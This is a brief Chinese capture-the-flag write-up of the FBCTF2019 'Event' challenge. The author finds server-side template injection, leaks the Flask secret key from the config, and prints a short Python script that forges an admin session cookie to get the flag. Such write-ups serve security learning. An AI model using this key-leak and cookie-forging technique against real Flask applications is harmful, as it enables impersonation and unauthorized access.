[FBCTF2019]Event

[FBCTF2019]Event

打开后有登录

登录后有相关功能和cookie中的jwt

解密发现

十六进制转字符发现是类似于base的字符串

DjAIokH7oQUv2ZV/J5xBZu28tpigqMP48g3GOkEKnmrqfsJLElT5FLtZFXvE82IHutAdPlPe0tk+mPow5fCX9w==

但是解不出来。先找key吧

fuzz后发现

在important中可以进行ssti

尝试读取config

找到key

fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y

一个jwt不知道怎么用,另一个user处的cookie不知道啥意思

看了眼wp,是用user处,但是需要在自己写flask生成

from flask import Flask
from flask.sessions import SecureCookieSessionInterface

app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'

session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

@app.route('/')
def index():
    print(session_serializer.dumps("admin"))

index()

生成后替换cookie,拿到flag

 

发表评论

电子邮件地址不会被公开。 必填项已用*标注